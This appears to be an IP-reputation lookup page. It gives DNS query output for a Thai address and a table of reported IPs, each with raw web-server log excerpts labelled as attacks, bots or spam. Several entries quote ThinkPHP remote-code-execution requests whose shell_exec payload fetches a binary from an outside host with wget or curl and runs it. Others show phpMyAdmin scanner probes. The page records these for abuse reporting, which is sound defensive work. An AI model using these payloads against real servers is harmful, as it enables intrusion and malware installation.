City: unknown
Region: unknown
Country: Thailand
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
| IP | Type | Details | Datetime |
|---|---|---|---|
| 113.53.66.57 | attackbots | Unauthorized connection attempt from IP address 113.53.66.57 on Port 445(SMB) |
2020-01-31 19:25:20 |
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 113.53.66.207
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31330
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;113.53.66.207. IN A
;; AUTHORITY SECTION:
. 597 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022030400 1800 900 604800 86400
;; Query time: 65 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Mar 04 13:59:11 CST 2022
;; MSG SIZE rcvd: 106207.66.53.113.in-addr.arpa domain name pointer node-d73.pool-113-53.dynamic.totinternet.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
207.66.53.113.in-addr.arpa name = node-d73.pool-113-53.dynamic.totinternet.net.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 159.89.153.54 | attack | abuseip |
2019-04-19 17:03:14 |
| 192.243.53.51 | bots | 192.243.53.51 - - [17/Apr/2019:17:34:27 +0800] "GET / HTTP/1.1" 200 29611 "-" "SEMrushBot" |
2019-04-17 17:35:08 |
| 1.20.151.73 | attack | 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 .2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmin._/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49. 0.2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpmyadmin2222/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4 9.0.2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /php2MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 .2623.105 Safari/537.36" |
2019-04-13 06:21:32 |
| 113.237.176.72 | attack | 113.237.176.72 - - [12/Apr/2019:13:28:32 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-12 13:29:24 |
| 81.92.203.247 | spam | 81.92.203.247 - - [21/Apr/2019:05:49:50 +0800] "GET /index.php/2018/12/14/bert-transformer/ HTTP/1.0" 200 44744 "https://www.eznewstoday.com/index.php/2018/12/14/bert-transformer/" "Mozil la/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36" 81.92.203.247 - - [21/Apr/2019:05:49:51 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4143 "https://www.eznewstoday.com/index.php/2018/12/14/bert-transformer/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36" 81.92.203.247 - - [21/Apr/2019:05:49:51 +0800] "GET /index.php/2018/12/14/bert-transformer/ HTTP/1.0" 200 44744 "https://www.eznewstoday.com/index.php/2018/12/14/bert-transformer/#comment -14272" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36" |
2019-04-21 06:58:05 |
| 54.242.155.91 | attack | 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET HTTP/1.1" 400 182 "-" "-" |
2019-04-14 19:37:25 |
| 80.241.211.186 | bots | Crawler: majestic |
2019-04-19 16:58:10 |
| 52.114.6.38 | bots | 52.114.6.38 - - [12/Apr/2019:14:09:43 +0800] "GET /check-ip/106.13.55.69 HTTP/1.1" 200 53479 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5" 52.114.6.38 - - [12/Apr/2019:14:09:43 +0800] "GET /static/favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5" |
2019-04-12 14:15:45 |
| 139.59.23.231 | attack | ZmEu是个phpMyAdmin脆弱性检查工具,可以发现phpMyAdmin的漏洞,从而进行攻击 139.59.23.231 - - [20/Apr/2019:10:24:06 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 498 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:07 +0800] "GET /phpMyAdmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:08 +0800] "GET /phpmyadmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 404 480 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /scripts/setup.php/index.php HTTP/1.1" 404 484 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:11 +0800] "GET HTTP/1.1" 400 0 "-" "-" 139.59.23.231 - - [20/Apr/2019:10:24:12 +0800] "GET HTTP/1.1" 400 0 "-" "-" |
2019-04-20 10:49:01 |
| 104.128.144.131 | botsattack | 扫描 104.128.144.131 - - [20/Apr/2019:12:32:14 +0800] "GET / HTTP/1.0" 301 194 "-" "www.probethenet.com scanner" |
2019-04-20 12:33:12 |
| 54.36.127.189 | spambotsattackproxy | 54.36.127.189 - - [19/Apr/2019:14:22:46 +0800] "POST http://gp.snaware.com/judge2/?key=IOdfnl%2fCTnpe%2bgUsWXoxmtdrckp5zwGQDhDM88YeJX2aNAjy0XDwKxanFBTTiMXA&h=3Olzt8rgiM&f=false&t=555525 HTTP/1.1" 301 194 "gatherproxy.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; FDM)" 54.36.127.189 - - [19/Apr/2019:14:22:47 +0800] "CONNECT gp.snaware.com:443 HTTP/1.1" 400 182 "-" "-" |
2019-04-19 14:23:41 |
| 165.22.159.9 | attack | 165.22.159.9 - - [18/Apr/2019:08:05:25 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 165.22.159.9 - - [18/Apr/2019:08:05:26 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.12.4" 165.22.159.9 - - [18/Apr/2019:08:05:26 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 165.22.159.9 - - [18/Apr/2019:08:05:27 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.12.4" |
2019-04-18 08:06:11 |
| 142.93.214.167 | attack | 142.93.214.167 - - [16/Apr/2019:06:00:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:06 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:08 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4" |
2019-04-16 06:28:55 |
| 163.177.90.152 | attack | 163.177.90.152 - - [16/Apr/2019:03:56:56 +0800] "GET /cainiao.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [16/Apr/2019:03:56:56 +0800] "GET /cmv.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [16/Apr/2019:03:56:56 +0800] "GET /cainiao.php HTTP/1.1" 404 209 "http://118.25.52.138/cainiao.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [16/Apr/2019:03:56:56 +0800] "GET /cmv.php HTTP/1.1" 404 209 "http://118.25.52.138/cmv.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-16 06:29:31 |
| 116.7.22.4 | bots | 116.7.22.4 - - [19/Apr/2019:21:44:40 +0800] "GET /index.php/category/root/ HTTP/1.1" 200 74293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:44:46 +0800] "GET /index.php/category/root/airbnb/ HTTP/1.1" 200 76208 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:44:54 +0800] "GET /index.php/category/root/amd/ HTTP/1.1" 200 105403 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:45:09 +0800] "GET /index.php/category/root/instacart/ HTTP/1.1" 200 54716 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:45:18 +0800] "GET /index.php/category/root/lyft/ HTTP/1.1" 200 75675 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" |
2019-04-19 21:48:14 |